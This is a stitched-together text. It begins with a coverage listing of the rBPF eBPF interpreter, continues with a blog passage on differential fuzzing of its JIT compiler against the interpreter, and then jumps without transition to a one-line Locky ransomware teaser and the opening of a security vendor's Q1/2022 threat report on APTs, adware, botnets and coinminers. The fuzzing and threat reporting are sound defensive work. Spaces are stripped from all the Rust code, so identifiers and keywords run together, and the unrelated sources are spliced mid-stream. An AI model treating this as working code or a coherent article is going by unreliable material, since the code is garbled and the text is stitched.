class825||ebpf::ST_B_IMM=>{826|8|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;827|8|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u8);^1828|1|unsafe{*host_ptr=insn.immasu8};829||},830||ebpf::ST_H_IMM=>{831|11|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;832|11|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u16);^6833|6|unsafe{*host_ptr=insn.immasu16};834||},835||ebpf::ST_W_IMM=>{836|9|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;837|9|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u32);^6838|6|unsafe{*host_ptr=insn.immasu32};839||},840||ebpf::ST_DW_IMM=>{841|16|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;842|16|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u64);^11843|11|unsafe{*host_ptr=insn.immasu64};844||},845||846||// BPF_STX class847||ebpf::ST_B_REG=>{848|9|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;849|9|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u8);^2850|2|unsafe{*host_ptr=reg[src]asu8};851||},852||ebpf::ST_H_REG=>{853|8|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;854|8|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u16);^3855|3|unsafe{*host_ptr=reg[src]asu16};856||},857||ebpf::ST_W_REG=>{858|7|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;859|7|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u32);^2860|2|unsafe{*host_ptr=reg[src]asu32};861||},862||ebpf::ST_DW_REG=>{863|7|letvm_addr=(reg[dst]asi64).wrapping_add(insn.offasi64)asu64;864|7|lethost_ptr=translate_memory_access!(self,vm_addr,AccessType::Store,pc,u64);^2865|2|unsafe{*host_ptr=reg[src]asu64};866||},867||868||// BPF_ALU class869|136|ebpf::ADD32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_add(insn.immasi32)asu64,870|18|ebpf::ADD32_REG=>reg[dst]=(reg[dst]asi32).wrapping_add(reg[src]asi32)asu64,871|94|ebpf::SUB32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_sub(insn.immasi32)asu64,872|14|ebpf::SUB32_REG=>reg[dst]=(reg[dst]asi32).wrapping_sub(reg[src]asi32)asu64,873|226|ebpf::MUL32_IMM=>reg[dst]=(reg[dst]asi32).wrapping_mul(insn.immasi32)asu64,874|15|ebpf::MUL32_REG=>reg[dst]=(reg[dst]asi32).wrapping_mul(reg[src]asi32)asu64,875|98|ebpf::DIV32_IMM=>reg[dst]=(reg[dst]asu32/insn.immasu32)asu64,876||ebpf::DIV32_REG=>{877|4|ifreg[src]asu32==0{878|2|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));879|2|}880|2|reg[dst]=(reg[dst]asu32/reg[src]asu32)asu64;881||},882||ebpf::SDIV32_IMM=>{883|0|ifreg[dst]asi32==i32::MIN&&insn.imm==-1{884|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));885|0|}886|0|reg[dst]=(reg[dst]asi32/insn.immasi32)asu64;887||}888||ebpf::SDIV32_REG=>{889|0|ifreg[src]asi32==0{890|0|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));891|0|}892|0|ifreg[dst]asi32==i32::MIN&®[src]asi32==-1{893|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));894|0|}895|0|reg[dst]=(reg[dst]asi32/reg[src]asi32)asu64;896||},897|102|ebpf::OR32_IMM=>reg[dst]=(reg[dst]asu32|insn.immasu32)asu64,898|13|ebpf::OR32_REG=>reg[dst]=(reg[dst]asu32|reg[src]asu32)asu64,899|46|ebpf::AND32_IMM=>reg[dst]=(reg[dst]asu32&insn.immasu32)asu64,900|16|ebpf::AND32_REG=>reg[dst]=(reg[dst]asu32®[src]asu32)asu64,901|4|ebpf::LSH32_IMM=>reg[dst]=(reg[dst]asu32).wrapping_shl(insn.immasu32)asu64,902|32|ebpf::LSH32_REG=>reg[dst]=(reg[dst]asu32).wrapping_shl(reg[src]asu32)asu64,903|2|ebpf::RSH32_IMM=>reg[dst]=(reg[dst]asu32).wrapping_shr(insn.immasu32)asu64,904|4|ebpf::RSH32_REG=>reg[dst]=(reg[dst]asu32).wrapping_shr(reg[src]asu32)asu64,905|54|ebpf::NEG32=>{reg[dst]=(reg[dst]asi32).wrapping_neg()asu64;reg[dst]&=u32::MAXasu64;},906|90|ebpf::MOD32_IMM=>reg[dst]=(reg[dst]asu32%insn.immasu32)asu64,907||ebpf::MOD32_REG=>{908|20|ifreg[src]asu32==0{909|6|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));910|14|}911|14|reg[dst]=(reg[dst]asu32%reg[src]asu32)asu64;912||},913|96|ebpf::XOR32_IMM=>reg[dst]=(reg[dst]asu32^insn.immasu32)asu64,914|14|ebpf::XOR32_REG=>reg[dst]=(reg[dst]asu32^reg[src]asu32)asu64,915|59|ebpf::MOV32_IMM=>reg[dst]=insn.immasu32asu64,916|7|ebpf::MOV32_REG=>reg[dst]=(reg[src]asu32)asu64,917|15|ebpf::ARSH32_IMM=>{reg[dst]=(reg[dst]asi32).wrapping_shr(insn.immasu32)asu64;reg[dst]&=u32::MAXasu64;},918|236|ebpf::ARSH32_REG=>{reg[dst]=(reg[dst]asi32).wrapping_shr(reg[src]asu32)asu64;reg[dst]&=u32::MAXasu64;},919|2|ebpf::LE=>{920|2|reg[dst]=matchinsn.imm{921|1|16=>(reg[dst]asu16).to_le()asu64,922|1|32=>(reg[dst]asu32).to_le()asu64,923|0|64=>reg[dst].to_le(),924||_=>{925|0|returnErr(EbpfError::InvalidInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));926||}927||};928||},929|2|ebpf::BE=>{930|2|reg[dst]=matchinsn.imm{931|1|16=>(reg[dst]asu16).to_be()asu64,932|1|32=>(reg[dst]asu32).to_be()asu64,933|0|64=>reg[dst].to_be(),934||_=>{935|0|returnErr(EbpfError::InvalidInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));936||}937||};938||},939||940||// BPF_ALU64 class941|16.7k|ebpf::ADD64_IMM=>reg[dst]=reg[dst].wrapping_add(insn.immasu64),942|26|ebpf::ADD64_REG=>reg[dst]=reg[dst].wrapping_add(reg[src]),943|145|ebpf::SUB64_IMM=>reg[dst]=reg[dst].wrapping_sub(insn.immasu64),944|25|ebpf::SUB64_REG=>reg[dst]=reg[dst].wrapping_sub(reg[src]),945|480|ebpf::MUL64_IMM=>reg[dst]=reg[dst].wrapping_mul(insn.immasu64),946|13|ebpf::MUL64_REG=>reg[dst]=reg[dst].wrapping_mul(reg[src]),947|191|ebpf::DIV64_IMM=>reg[dst]/=insn.immasu64,948||ebpf::DIV64_REG=>{949|5|ifreg[src]==0{950|3|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));951|2|}952|2|reg[dst]/=reg[src];953||},954||ebpf::SDIV64_IMM=>{955|0|ifreg[dst]asi64==i64::MIN&&insn.imm==-1{956|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));957|0|}958|0|959|0|reg[dst]=(reg[dst]asi64/insn.imm)asu64960||}961||ebpf::SDIV64_REG=>{962|0|ifreg[src]==0{963|0|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));964|0|}965|0|ifreg[dst]asi64==i64::MIN&®[src]asi64==-1{966|0|returnErr(EbpfError::DivideOverflow(pc+ebpf::ELF_INSN_DUMP_OFFSET));967|0|}968|0|reg[dst]=(reg[dst]asi64/reg[src]asi64)asu64;969||},970|115|ebpf::OR64_IMM=>reg[dst]|=insn.immasu64,971|19|ebpf::OR64_REG=>reg[dst]|=reg[src],972|93|ebpf::AND64_IMM=>reg[dst]&=insn.immasu64,973|19|ebpf::AND64_REG=>reg[dst]&=reg[src],974|19|ebpf::LSH64_IMM=>reg[dst]=reg[dst].wrapping_shl(insn.immasu32),975|48|ebpf::LSH64_REG=>reg[dst]=reg[dst].wrapping_shl(reg[src]asu32),976|4|ebpf::RSH64_IMM=>reg[dst]=reg[dst].wrapping_shr(insn.immasu32),977|5|ebpf::RSH64_REG=>reg[dst]=reg[dst].wrapping_shr(reg[src]asu32),978|94|ebpf::NEG64=>reg[dst]=(reg[dst]asi64).wrapping_neg()asu64,979|141|ebpf::MOD64_IMM=>reg[dst]%=insn.immasu64,980||ebpf::MOD64_REG=>{981|19|ifreg[src]==0{982|4|returnErr(EbpfError::DivideByZero(pc+ebpf::ELF_INSN_DUMP_OFFSET));983|15|}984|15|reg[dst]%=reg[src];985||},986|98|ebpf::XOR64_IMM=>reg[dst]^=insn.immasu64,987|17|ebpf::XOR64_REG=>reg[dst]^=reg[src],988|89|ebpf::MOV64_IMM=>reg[dst]=insn.immasu64,989|10|ebpf::MOV64_REG=>reg[dst]=reg[src],990|14|ebpf::ARSH64_IMM=>reg[dst]=(reg[dst]asi64).wrapping_shr(insn.immasu32)asu64,991|294|ebpf::ARSH64_REG=>reg[dst]=(reg[dst]asi64).wrapping_shr(reg[src]asu32)asu64,992||993||// BPF_JMP class994|327k|ebpf::JA=>{next_pc=(next_pcasisize+insn.offasisize)asusize;},995|116|ebpf::JEQ_IMM=>ifreg[dst]==insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^76^40996|131k|ebpf::JEQ_REG=>ifreg[dst]==reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^11997|163k|ebpf::JGT_IMM=>ifreg[dst]>insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^147k^16.4k998|131k|ebpf::JGT_REG=>ifreg[dst]>reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^34999|65.5k|ebpf::JGE_IMM=>ifreg[dst]>=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^81000|65.5k|ebpf::JGE_REG=>ifreg[dst]>=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^111001|65.5k|ebpf::JLT_IMM=>ifreg[dst]<insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^31002|6|ebpf::JLT_REG=>ifreg[dst]<reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^4^21003|131k|ebpf::JLE_IMM=>ifreg[dst]<=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^21004|65.5k|ebpf::JLE_REG=>ifreg[dst]<=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^21005|3|ebpf::JSET_IMM=>ifreg[dst]&insn.immasu64!=0{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1^21006|2|ebpf::JSET_REG=>ifreg[dst]®[src]!=0{next_pc=(next_pcasisize+insn.offasisize)asusize;},^01007|196k|ebpf::JNE_IMM=>ifreg[dst]!=insn.immasu64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^196k^31008|131k|ebpf::JNE_REG=>ifreg[dst]!=reg[src]{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^31009|65.5k|ebpf::JSGT_IMM=>ifreg[dst]asi64>insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^61010|14|ebpf::JSGT_REG=>ifreg[dst]asi64>reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^1^131011|65.5k|ebpf::JSGE_IMM=>ifreg[dst]asi64>=insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^121012|65.5k|ebpf::JSGE_REG=>ifreg[dst]asi64>=reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^41013|131k|ebpf::JSLT_IMM=>if(reg[dst]asi64)<insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^201014|147k|ebpf::JSLT_REG=>if(reg[dst]asi64)<reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^147k^231015|65.5k|ebpf::JSLE_IMM=>if(reg[dst]asi64)<=insn.immasi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^65.5k^41016|131k|ebpf::JSLE_REG=>if(reg[dst]asi64)<=reg[src]asi64{next_pc=(next_pcasisize+insn.offasisize)asusize;},^131k^21017||1018||ebpf::CALL_REG=>{1019|0|lettarget_address=reg[insn.immasusize];1020|0|reg[ebpf::FRAME_PTR_REG]=1021|0|self.stack.push(®[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS],next_pc)?;1022|0|iftarget_address<self.program_vm_addr{1023|0|returnErr(EbpfError::CallOutsideTextSegment(pc+ebpf::ELF_INSN_DUMP_OFFSET,target_address/ebpf::INSN_SIZEasu64*ebpf::INSN_SIZEasu64));1024|0|}1025|0|next_pc=self.check_pc(pc,(target_address-self.program_vm_addr)asusize/ebpf::INSN_SIZE)?;1026||},1027||1028||// Do not delegate the check to the verifier, since registered functions can be1029||// changed after the program has been verified.1030||ebpf::CALL_IMM=>{1031|17|letmutresolved=false;1032|17|let(syscalls,calls)=ifconfig.static_syscalls{1033|17|(insn.src==0,insn.src!=0)1034||}else{1035|0|(true,true)1036||};1037||1038|17|ifsyscalls{1039|6|ifletSome(syscall)=self.executable.get_syscall_registry().lookup_syscall(insn.immasu32){^01040|0|resolved=true;1041|0|1042|0|ifconfig.enable_instruction_meter{1043|0|let_=instruction_meter.consume(*last_insn_count);1044|0|}1045|0|*last_insn_count=0;1046|0|letmutresult:ProgramResult<E>=Ok(0);1047|0|(unsafe{std::mem::transmute::<u64,SyscallFunction::<E,*mutu8>>(syscall.function)})(1048|0|self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET+syscall.context_object_slot],1049|0|reg[1],1050|0|reg[2],1051|0|reg[3],1052|0|reg[4],1053|0|reg[5],1054|0|&self.memory_mapping,1055|0|&mutresult,1056|0|);1057|0|reg[0]=result?;1058|0|ifconfig.enable_instruction_meter{1059|0|remaining_insn_count=instruction_meter.get_remaining();1060|0|}1061|6|}1062|11|}1063||1064|17|ifcalls{1065|11|ifletSome(target_pc)=self.executable.lookup_bpf_function(insn.immasu32){^01066|0|resolved=true;1067||1068||// make BPF to BPF call1069|0|reg[ebpf::FRAME_PTR_REG]=1070|0|self.stack.push(®[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS],next_pc)?;1071|0|next_pc=self.check_pc(pc,target_pc)?;1072|11|}1073|6|}1074||1075|17|if!resolved{1076|17|ifconfig.disable_unresolved_symbols_at_runtime{1077|6|returnErr(EbpfError::UnsupportedInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET));1078||}else{1079|11|self.executable.report_unresolved_symbol(pc)?;1080||}1081|0|}1082||}1083||1084||ebpf::EXIT=>{1085|39|matchself.stack.pop::<E>(){1086|0|Ok((saved_reg,frame_ptr,ptr))=>{1087|0|// Return from BPF to BPF call1088|0|reg[ebpf::FIRST_SCRATCH_REG1089|0|..ebpf::FIRST_SCRATCH_REG+ebpf::SCRATCH_REGS]1090|0|.copy_from_slice(&saved_reg);1091|0|reg[ebpf::FRAME_PTR_REG]=frame_ptr;1092|0|next_pc=self.check_pc(pc,ptr)?;1093||}1094||_=>{1095|39|returnOk(reg[0]);1096||}1097||}1098||}1099|0|_=>returnErr(EbpfError::UnsupportedInstruction(pc+ebpf::ELF_INSN_DUMP_OFFSET)),1100||}1101||1102|2.16M|ifconfig.enable_instruction_meter&&*last_insn_count>=remaining_insn_count{1103||// Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction1104|33|returnErr(EbpfError::ExceededMaxInstructions(pc+instruction_width+ebpf::ELF_INSN_DUMP_OFFSET,initial_insn_count));1105|2.16M|}1106||}1107||1108|683|Err(EbpfError::ExecutionOverrun(1109|683|next_pc+ebpf::ELF_INSN_DUMP_OFFSET,1110|683|))1111|886|}
Now we see that jump and call instructions are actually used, and that we
execute the content of the interpreter loop significantly more despite having
approximately the same amount of successful calls to the interpreter function.
From this, we can infer that not only are more programs successfully executed,
but also that, of those executed, they tend to have more valid instructions
executed overall.
While this isn’t hitting every branch, it’s now hitting significantly more –
and with much more interesting values.
The development of this version of the fuzzer took about an hour, so we’re at
a total of one hour of development.
JIT and differential fuzzing
Now that we have a fuzzer which can generate lots of inputs that are actually
interesting to us, we can develop a fuzzer which can test both JIT and the
interpreter against each other. But how do we even test them against each
other?
Picking inputs, outputs, and configuration
As the definition of pseudo-oracle says: we need to check if the alternate
program (for JIT, the interpreter, and vice versa), when provided with the
same “input” provides the same “output”. So what inputs and outputs do we
have?
For inputs, there are three notable things we’ll want to vary:
The config which determines how the VM should execute (what features and
such)
The BPF program to be executed, which we’ll generate like we do in “smart”
The initial memory of the VMs
Once we’ve developed our inputs, we’ll also need to think of our outputs:
The “return state”, the exit code itself or the error state
The number of instructions executed (e.g., did the JIT program overrun?)
The final memory of the VMs
Then, to execute both JIT and the interpreter, we’ll take the following steps:
The same steps as the first fuzzers:
Use the rBPF verification pass (called “check”) to make sure that the VM
will accept the input program
Initialise the memory, the syscalls, and the entrypoint
Create the executable data
Then prepare to perform the differential testing
JIT compile the BPF code (if it fails, fail quietly)
Initialise the interpreted VM
Initialise the JIT VM
Execute both the interpreted and JIT VMs
Compare return state, instructions executed, and final memory, and
panic if any do not match.
Writing the fuzzer
As before, I’ve split this up into more manageable chunks so you can read them
one at a time outside of their context before trying to interpret their final
context.
fuzz_target!(|data:FuzzData|{letmutprog=make_program(&data.prog,Arch::X64);...snip...letconfig=data.template.into();ifcheck(prog.into_bytes(),&config).is_err(){// verify pleasereturn;}letmutinterp_mem=data.mem.clone();letmutjit_mem=data.mem;letregistry=SyscallRegistry::default();letmutbpf_functions=BTreeMap::new();register_bpf_function(&config,&mutbpf_functions,®istry,0,"entrypoint").unwrap();letmutexecutable=Executable::<UserError,TestInstructionMeter>::from_text_bytes(prog.into_bytes(),None,config,SyscallRegistry::default(),bpf_functions,).unwrap();ifExecutable::jit_compile(&mutexecutable).is_ok(){letinterp_mem_region=MemoryRegion::new_writable(&mutinterp_mem,ebpf::MM_INPUT_START);letmutinterp_vm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],vec![interp_mem]).unwrap();letjit_mem_region=MemoryRegion::new_writable(&mutjit_mem,ebpf::MM_INPUT_START);letmutjit_vm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],vec![jit_mem_region]).unwrap();// See step 3}});
Step 3: Executing our input and comparing output
fuzz_target!(|data:FuzzData|{// see step 2ifExecutable::jit_compile(&mutexecutable).is_ok(){// see step 2letmutinterp_meter=TestInstructionMeter{remaining:1<<16};letinterp_res=interp_vm.execute_program_interpreted(&mutinterp_meter);letmutjit_meter=TestInstructionMeter{remaining:1<<16};letjit_res=jit_vm.execute_program_jit(&mutjit_meter);ifinterp_res!=jit_res{panic!("Expected {:?}, but got {:?}",interp_res,jit_res);}ifinterp_res.is_ok(){// we know jit res must be ok if interp res is by this pointifinterp_meter.remaining!=jit_meter.remaining{panic!("Expected {} insts remaining, but got {}",interp_meter.remaining,jit_meter.remaining);}ifinterp_mem!=jit_mem{panic!("Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",interp_mem,jit_mem);}}}});
Step 4: Put it together
Below is the final code for the fuzzer, including all of the bits I didn’t
show above for concision.
#![no_main]usestd::collections::BTreeMap;uselibfuzzer_sys::fuzz_target;usegrammar_aware::*;usesolana_rbpf::{elf::{register_bpf_function,Executable},insn_builder::{Arch,Instruction,IntoBytes},memory_region::MemoryRegion,user_error::UserError,verifier::check,vm::{EbpfVm,SyscallRegistry,TestInstructionMeter},};usecrate::common::ConfigTemplate;modcommon;modgrammar_aware;#[derive(arbitrary::Arbitrary,Debug)]structFuzzData{template:ConfigTemplate,exit_dst:u8,exit_src:u8,exit_off:i16,exit_imm:i64,prog:FuzzProgram,mem:Vec<u8>,}fuzz_target!(|data:FuzzData|{letmutprog=make_program(&data.prog,Arch::X64);prog.exit().set_dst(data.exit_dst).set_src(data.exit_src).set_off(data.exit_off).set_imm(data.exit_imm).push();letconfig=data.template.into();ifcheck(prog.into_bytes(),&config).is_err(){// verify pleasereturn;}letmutinterp_mem=data.mem.clone();letmutjit_mem=data.mem;letregistry=SyscallRegistry::default();letmutbpf_functions=BTreeMap::new();register_bpf_function(&config,&mutbpf_functions,®istry,0,"entrypoint").unwrap();letmutexecutable=Executable::<UserError,TestInstructionMeter>::from_text_bytes(prog.into_bytes(),None,config,SyscallRegistry::default(),bpf_functions,).unwrap();ifExecutable::jit_compile(&mutexecutable).is_ok(){letinterp_mem_region=MemoryRegion::new_writable(&mutinterp_mem,ebpf::MM_INPUT_START);letmutinterp_vm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],vec![interp_mem]).unwrap();letjit_mem_region=MemoryRegion::new_writable(&mutjit_mem,ebpf::MM_INPUT_START);letmutjit_vm=EbpfVm::<UserError,TestInstructionMeter>::new(&executable,&mut[],vec![jit_mem_region]).unwrap();letmutinterp_meter=TestInstructionMeter{remaining:1<<16};letinterp_res=interp_vm.execute_program_interpreted(&mutinterp_meter);letmutjit_meter=TestInstructionMeter{remaining:1<<16};letjit_res=jit_vm.execute_program_jit(&mutjit_meter);ifinterp_res!=jit_res{panic!("Expected {:?}, but got {:?}",interp_res,jit_res);}ifinterp_res.is_ok(){// we know jit res must be ok if interp res is by this pointifinterp_meter.remaining!=jit_meter.remaining{panic!("Expected {} insts remaining, but got {}",interp_meter.remaining,jit_meter.remaining);}ifinterp_mem!=jit_mem{panic!("Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",interp_mem,jit_mem);}}}});
Theoretically, an up-to-date version is available in the
rBPF repo.
And, with that, we have our fuzzer! This part of the fuzzer took approximately
three hours to implement (largely due to finding several issues with the
fuzzer and debugging them along the way).
At this point, we were about six hours in. I turned on the fuzzer and waited:
$ cargo +nightly fuzz run smart-jit-diff --jobs 4 ---ignore_crashes=1
And the crashes began. Two main bugs appeared:
A panic when there was an error in interpreter, but not JIT, when writing
to a particular address (crash in 15 minutes)
A AddressSanitizer crash from a memory leak when an error occurred just
after the instruction limit was past by the JIT’d program (crash in two
hours)
To read the details of these bugs, continue to Part 2.
by splinter_code - 26 June 2016 Locky ransomware starts up again its illegal activity of stealing money from their victims after a temporary inactivity since the end of May. This time, it comes with hard-coded javascript...
The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.
Similar to what’s happening in Ukraine, the warfare co-occurring in cyberspace is also very intensive, with a wide range of offensive arsenal in use. To name a few, we witnessed multiple Russia-attributed APT groups attacking Ukraine (using a series of wiping malware and ransomware, a massive uptick of Gamaredon APT toolkit activity, and satellite internet connections were disrupted). In addition, hacktivism, DDoS attacks on government sites, or data leaks are ongoing daily on all sides of the conflict. Furthermore, some of the malware authors and operators were directly affected by the war, such as the alleged death of the Raccoon Stealer leading developer, which resulted in (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen the sides in this conflict and have started threatening the others. One such example is the Conti gang that promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.
With all that said, it is hardly surprising to say that we’ve seen a significant increase of attacks of particular malware types in countries involved in this conflict in Q1/2022; for example, +50% of RAT attacks were blocked in Ukraine, Russia, and Belarus, +30% for botnets, and +20% for info stealers. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for the HermeticRansom that we discovered in Ukraine just a few hours before the invasion started.
Out of the other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, again, the Lapsus$ hacking group emerged with breaches in big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.
Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.
Stay safe and enjoy reading this report.
Jakub Křoustek, Malware Research Director
Methodology
This report is structured into two main sections – Desktop-related threats, informing about our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, where we advise about Android and iOS attacks.
Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.
Desktop-Related Threats
Advanced Persistent Threats (APTs)
In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.
Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they discovered a new data wiper called HermeticWiper. The attacker’s motivation was to destroy and maximize damage to the infected system. It’s not just disrupting the MBR but also destroying a filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.
Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. We see the standard high level of activity of this APT group in Ukraine which accelerated rapidly since the beginning of the Russian invasion at the end of February when the number of their attacks grew several times over.
We also noticed an increase in Korplug activity which expanded its focus from the more usual south Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road initiative.
Luigino Camastra, Malware Researcher Igor Morgenstern, Malware Researcher Jan Holman, Malware Researcher
Adware
Desktop adware has become more aggressive in Q4/21, and a similar trend persists in Q1/22, as the graph below illustrates:
On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.
On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.
Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.
Concerning the top strains, most of 64% of adware was from various adware families. However, the first clearly identified family is RelevantKnowledge, although so far with a low prevalence (5%) but with a +97% increase compared to Q4/21. Other identified strains in percentage units are ICLoader, Neoreklami, DownloadAssistant, and Conduit.
As mentioned above, the adware activity has a similar trend as in Q4/21. Therefore the risk ratios remained the same. The most affected regions are still Africa and Asia. About Q1/22 data, we monitored an increase of protected users in Japan (+209%) and France (+87%) compared with Q4/21. On the other hand, a decrease was observed in the Russian Federation (-51%) and Ukraine (-50%).
Adware risk ratio in Q1/22.
Martin Chlumecký, Malware Researcher
Bots
It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through Emotet takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and Conti’s internal communication leaks indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly also with BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp in the log “20220404”, interestingly seen on 24th March, instead of the one we’ve been accustomed to seeing (“20211114”).
There has been a new-ish trend coming with the advent of the war in Ukraine. Simple Javascript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by a text denouncing Russian aggression in Ukraine in multiple languages. The code has quickly spread around the internet into different variations, such as a variant of open-sourced game 2048. Unfortunately, we’ve started to see webpages that incorporated that code without even declaring it so it could even happen that your computer would participate in those actions while you were checking the weather on the internet. While these could remind us of Anonymous DDoS operations and LOIC (open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public using their browser only with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.
The rest of the landscape does not bring many surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%); those shouldn’t be much of a surprise, though, for the latter, it mostly does not project much into the number of affected clients.
In terms of numbers, the most prevalent strain was Emotet which doubled its market share since last quarter. Since the previous quarter, most of the other top strains slightly declined their prevalence. The most common strains we are seeing are:
Emotet
Amadey
Phorpiex
MyloBot
Nitol
MyKings
Dorkbot
Tofsee
Qakbot
Adolf Středa, Malware Researcher
Coinminers
Coincidently, as the cryptocurrency prices are somewhat stable these days, the same goes for the malicious coinmining activity in our user base.
In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continuous and increasing trend of using various web miners executing javascript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).
